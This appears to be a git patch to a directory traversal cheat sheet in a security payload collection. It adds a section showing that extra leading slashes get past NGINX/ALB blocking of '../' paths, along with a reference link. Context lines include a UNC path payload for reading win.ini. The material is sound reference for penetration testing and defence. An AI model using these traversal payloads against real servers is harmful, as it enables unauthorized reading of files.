From e8744406f98155c0ebb0a80e50ac6f6496f4d0cf Mon Sep 17 00:00:00 2001
From: irotem <rotemb@gmail.com>
Date: Sun, 4 Oct 2020 12:42:51 +0300
Subject: [PATCH] Added traversal bypass of nginx/alb

---
 Directory Traversal/README.md | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md
index 3993305..1f316a3 100644
--- a/Directory Traversal/README.md	
+++ b/Directory Traversal/README.md	
@@ -12,6 +12,7 @@
     * [Bypass "../" with ";"](#bypass--with-)
     * [Double URL encoding](#double-url-encoding)
     * [UNC Bypass](#unc-bypass)
+    * [NGINX/ALB Bypass](#nginxalb-bypass)
 * [Path Traversal](#path-traversal)
     * [Interesting Linux files](#interesting-linux-files)
     * [Interesting Windows files](#interesting-windows-files)
@@ -89,6 +90,14 @@ An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software
 \\localhost\c$\windows\win.ini
 ```
 
+### NGINX/ALB Bypass
+
+NGINX in certain configurations and ALB can block traversal attacks in the route, For example:
+```http://nginx-server/../../``` will return a 400 bad request.
+
+To bypass this behaviour just add forward slashes in front of the url:
+```http://nginx-server////////../../```
+
 
 ## Path Traversal
 
@@ -178,3 +187,4 @@ The following log files are controllable and can be included with an evil payloa
 * [Path Traversal Cheat Sheet: Windows](https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/)
 * [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
 * [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)
+* [NGINX may be protecting your applications from traversal attacks without you even knowing](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381)